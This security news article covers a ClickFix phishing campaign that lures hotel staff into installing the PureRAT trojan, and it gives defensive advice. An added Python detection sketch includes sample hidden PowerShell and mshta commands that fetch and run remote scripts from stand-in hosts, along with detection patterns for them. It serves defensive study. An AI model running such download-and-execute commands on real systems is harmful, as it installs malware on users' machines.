
ClickFix Phishing Campaign Hits Global Hotels with Malware


A new ClickFix phishing campaign is sweeping across the hospitality sector, infecting hotel networks with PureRAT malware. Security researchers have uncovered a large-scale campaign impersonating booking platforms like Booking.com and Expedia to compromise hotel administrators and guests alike.

The operation leverages social engineering and malware-as-a-service tools, aiming to seize access to hotel extranets, harvest credentials, and conduct fraudulent financial activities.

How the ClickFix Phishing Attacks Work

The campaign begins with targeted phishing emails sent to hotel staff, disguised as urgent communications from trusted travel platforms. These messages often warn of “payment issues” or “reservation disputes,” prompting recipients to follow links that lead to ClickFix pages.

These deceptive pages instruct users to “fix the problem” by copying and executing specific code or downloading a “security patch.” In reality, the commands install PureRAT, a remote access trojan capable of full system control, credential theft, and persistence.

ClickFix attacks rely heavily on psychological pressure and credibility. By posing as legitimate customer service threads, they convince hotel employees to execute malicious actions themselves—bypassing most email or antivirus safeguards.

Inside the PureRAT Payload

PureRAT is a modular remote-access trojan associated with the “Pure” malware ecosystem. It gives attackers complete control of infected systems, allowing them to steal credentials, exfiltrate data, and deliver additional payloads.

Recent versions add evasion techniques such as DLL sideloading, Python-based loaders, and crypters like Ghost Crypt. These techniques make detection difficult and enable sustained access within hotel IT environments.

Once attackers gain credentials, they exploit legitimate hotel inboxes to target guests directly. Victims receive emails from real hotel addresses claiming they “paid twice” or need to “verify their booking,” leading to further card theft or duplicate charges.

Global Targeting of the Hospitality Sector

According to reports from Sekoia and Microsoft, ClickFix campaigns have been active since late 2024 and continue into 2025. Attackers primarily target hotel administrators, property managers, and third-party booking agents across Europe, North America, and Asia.

Cybercriminals even purchase stolen Booking.com, Expedia, and Airbnb credentials on Telegram channels and underground markets. These stolen accounts allow them to blend seamlessly into legitimate hotel operations, making detection nearly impossible.

Defensive Measures for Hotels and OTAs

Security experts advise hotels and online travel agencies to tighten authentication and staff awareness. Recommended steps include:

  • Enabling phishing-resistant MFA (e.g., FIDO2 keys) on all booking and OTA accounts.
  • Training staff to identify ClickFix-style lures, such as urgent “fix now” messages or video-guided instructions.
  • Monitoring for conversation hijacking within email threads involving guests.
  • Deploying EDR tools that detect command-line abuse, sideloading, and PureRAT behavior.
  • Revoking compromised cookies and tokens, which are frequently traded on dark markets.

Preventing these attacks requires a mix of technical controls and continuous employee vigilance, as most infections begin with human error.
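As an added illustration of the "command-line abuse" detection recommended above (not code from the article or from any vendor), the following Python sketch triages process-creation events for commands a user was talked into pasting. The field names (modelled on Sysmon Event ID 1), the interpreter list, the signal patterns and the sample events are all assumptions constructed for this example.

```python
import re
# Assumed field names, modelled on Sysmon Event ID 1 (process creation).
# All events are constructed samples; hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://cdn.example.invalid/fix.ps1 | iex"'
                    ' # Booking verification 4471'},
    {"host": "RESERVATIONS-02", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://portal.example.invalid/confirm.hta"},
    {"host": "BACKOFFICE-03", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"host": "IT-05", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]
# Assumption: script hosts that a pasted "fix" command would typically start.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
SIGNALS = {  # assumed heuristics, to be tuned per environment
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w\w*\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"\s-e(c|nc\w*)?\s", re.I),
    "download_and_run": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "lure_text": re.compile(r"\b(verif\w*|captcha|booking|reservation)\b", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the reasons an event looks like a user-pasted command."""
    if basename(event["Image"]) not in INTERPRETERS:
        return []
    reasons = []
    if basename(event["ParentImage"]) == "explorer.exe":  # started from the user's shell
        reasons.append("launched_from_explorer")
    reasons += [n for n, rx in SIGNALS.items() if rx.search(event["CommandLine"])]
    return reasons

def triage(events, threshold=2):
    """Return (host, reasons) for events with at least `threshold` reasons."""
    scored = ((e["host"], score_event(e)) for e in events)
    return [(host, reasons) for host, reasons in scored if len(reasons) >= threshold]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, ", ".join(reasons))
```

The threshold of two keeps an administrator opening a bare PowerShell window (one reason) out of the alert queue; legitimate management scripts that download content will need an allowlist.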

Final Thoughts

The latest ClickFix phishing campaign reveals how social engineering, automation, and remote-access tools are converging into one of the most effective cybercrime models targeting the hotel industry. By exploiting trust in major booking platforms, criminals infiltrate both business and guest systems with alarming precision.

Hotels must reinforce their digital defenses, authenticate every booking channel, and invest in proactive threat detection to counter this evolving menace.

Janet Andersen
